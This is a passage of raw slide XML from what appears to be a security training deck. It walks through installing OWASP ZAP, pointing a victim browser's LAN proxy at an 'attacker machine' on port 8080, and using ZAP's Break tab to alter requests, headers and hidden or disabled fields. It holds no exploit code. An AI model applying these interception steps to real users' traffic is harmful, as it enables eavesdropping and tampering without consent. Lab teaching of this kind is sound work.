          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6179261" y="17145"/>
            <a:ext cx="2947593" cy="623932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1579" name="Google Shape;1579;p226"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="282894" y="778192"/>
            <a:ext cx="8718300" cy="4007100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="215900" marR="0" lvl="0" indent="-209550" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500" cap="none">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500" cap="none">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell"/>
                <a:ea typeface="Rockwell"/>
                <a:cs typeface="Rockwell"/>
                <a:sym typeface="Rockwell"/>
              </a:rPr>
              <a:t>ou also can configure directly on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500" b="1" cap="none">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell"/>
                <a:ea typeface="Rockwell"/>
                <a:cs typeface="Rockwell"/>
                <a:sym typeface="Rockwell"/>
              </a:rPr>
              <a:t>Internet Properties</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500" cap="none">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell"/>
                <a:ea typeface="Rockwell"/>
                <a:cs typeface="Rockwell"/>
                <a:sym typeface="Rockwell"/>
              </a:rPr>
              <a:t> on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500" b="1" cap="none">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell"/>
                <a:ea typeface="Rockwell"/>
                <a:cs typeface="Rockwell"/>
                <a:sym typeface="Rockwell"/>
              </a:rPr>
              <a:t>Control Panel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500" cap="none">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell"/>
                <a:ea typeface="Rockwell"/>
                <a:cs typeface="Rockwell"/>
                <a:sym typeface="Rockwell"/>
              </a:rPr>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500" b="1" cap="none">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell"/>
                <a:ea typeface="Rockwell"/>
                <a:cs typeface="Rockwell"/>
                <a:sym typeface="Rockwell"/>
              </a:rPr>
              <a:t>Connections Tab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500" cap="none">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell"/>
                <a:ea typeface="Rockwell"/>
                <a:cs typeface="Rockwell"/>
                <a:sym typeface="Rockwell"/>
              </a:rPr>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500" b="1" cap="none">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell"/>
                <a:ea typeface="Rockwell"/>
                <a:cs typeface="Rockwell"/>
                <a:sym typeface="Rockwell"/>
              </a:rPr>
              <a:t>LAN Settings</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr marL="215900" marR="0" lvl="0" indent="-114300" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1500" b="1" cap="none">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Rockwell"/>
              <a:ea typeface="Rockwell"/>
              <a:cs typeface="Rockwell"/>
              <a:sym typeface="Rockwell"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="215900" marR="0" lvl="0" indent="-114300" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1500" b="1" cap="none">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Rockwell"/>
              <a:ea typeface="Rockwell"/>
              <a:cs typeface="Rockwell"/>
              <a:sym typeface="Rockwell"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="215900" marR="0" lvl="0" indent="-114300" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1500" b="1" cap="none">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Rockwell"/>
              <a:ea typeface="Rockwell"/>
              <a:cs typeface="Rockwell"/>
              <a:sym typeface="Rockwell"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="215900" marR="0" lvl="0" indent="-114300" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1500" b="1" cap="none">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Rockwell"/>
              <a:ea typeface="Rockwell"/>
              <a:cs typeface="Rockwell"/>
              <a:sym typeface="Rockwell"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="215900" marR="0" lvl="0" indent="-114300" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1500" b="1" cap="none">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Rockwell"/>
              <a:ea typeface="Rockwell"/>
              <a:cs typeface="Rockwell"/>
              <a:sym typeface="Rockwell"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="215900" marR="0" lvl="0" indent="-114300" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1500" b="1" cap="none">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Rockwell"/>
              <a:ea typeface="Rockwell"/>
              <a:cs typeface="Rockwell"/>
              <a:sym typeface="Rockwell"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="215900" marR="0" lvl="0" indent="-114300" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1500" b="1" cap="none">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Rockwell"/>
              <a:ea typeface="Rockwell"/>
              <a:cs typeface="Rockwell"/>
              <a:sym typeface="Rockwell"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="215900" marR="0" lvl="0" indent="-215900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" cap="none">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell"/>
                <a:ea typeface="Rockwell"/>
                <a:cs typeface="Rockwell"/>
                <a:sym typeface="Rockwell"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1800" cap="none">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell"/>
                <a:ea typeface="Rockwell"/>
                <a:cs typeface="Rockwell"/>
                <a:sym typeface="Rockwell"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="1800" cap="none">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1580" name="Google Shape;1580;p226"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3372524" y="4785315"/>
            <a:ext cx="1837200" cy="369300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr" anchorCtr="0">
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Rockwell"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2700" cap="none">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1581" name="Google Shape;1581;p226" descr="C:\Users\Dell\Downloads\zap-7.jpg"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2764568" y="1552073"/>
            <a:ext cx="3488531" cy="3439151"/>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27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="565483" y="1137638"/>
            <a:ext cx="8025000" cy="576900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="b" anchorCtr="0">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="38100" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="E7E9C9"/>
              </a:buClr>
              <a:buSzPct val="62500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Check the proxy server checkbox and enter the attackers machine ip address and port 8080</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1587" name="Google Shape;1587;p227"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6179261" y="17145"/>
            <a:ext cx="2947593" cy="623932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1588" name="Google Shape;1588;p227" descr="C:\Users\Dell\Downloads\zap-8.png"/>
          <p:cNvPicPr preferRelativeResize="0">
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3157887" y="2147062"/>
            <a:ext cx="2707500" cy="2414700"/>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228"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="190152"/>
            <a:ext cx="2042400" cy="649200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="b" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="38100" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="E7E9C9"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Setup ZAP </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2100">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="2100">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1594" name="Google Shape;1594;p228"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1146008"/>
            <a:ext cx="8229600" cy="3483600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="215900" lvl="0" indent="-266700" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Switch to Attacker Machine (Windows Server).</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="215900" lvl="0" indent="-266700" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Note: Make sure to install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Java Run time</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="215900" lvl="0" indent="-266700" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Download ZAP &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.zaproxy.org/download/</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="215900" lvl="0" indent="-266700" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>On installatin process, make sure to select the option: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>"No, I do not want to persist this session at this moment in time"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1800"/>
            </a:br>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="215900" lvl="0" indent="-114300" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1700"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1595" name="Google Shape;1595;p228" descr="C:\Users\Dell\Downloads\zap-1.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2326919" y="2625891"/>
            <a:ext cx="4002881" cy="1747211"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1596" name="Google Shape;1596;p228"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6179261" y="17145"/>
            <a:ext cx="2947593" cy="623932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt1"/>
          </a:solid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229"/>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b" anchorCtr="0">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="38100" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="E7E9C9"/>
              </a:buClr>
              <a:buSzPct val="116666"/>
              <a:buFont typeface="Rockwell"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1602" name="Google Shape;1602;p229"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385780" y="1234450"/>
            <a:ext cx="8419500" cy="2263500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-368300" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2200"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200"/>
              <a:t>On the OWASP ZAP main window, click on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200" b="1"/>
              <a:t>"+"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200"/>
              <a:t> icon in the right pane, then add the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200" b="1"/>
              <a:t>Break</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200"/>
              <a:t> tab, as shown below:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2200"/>
            </a:br>
            <a:endParaRPr sz="2200"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-368300" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2200"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200" b="1"/>
              <a:t>Break</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200"/>
              <a:t> tab allows you to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200" b="1"/>
              <a:t>modify a response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200" b="1"/>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200"/>
              <a:t> when it has been caught by the ZAP.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2200"/>
            </a:br>
            <a:endParaRPr sz="2200"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-368300" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2200"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200"/>
              <a:t>It also allows you to modify some elements that you cannot modify through your browser; these include: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200" b="1"/>
              <a:t>The Header, Hidden fields, Disabled fields, Fields that use Javascript to filter out illegal characters</a:t>
            </a:r>
            <a:r>
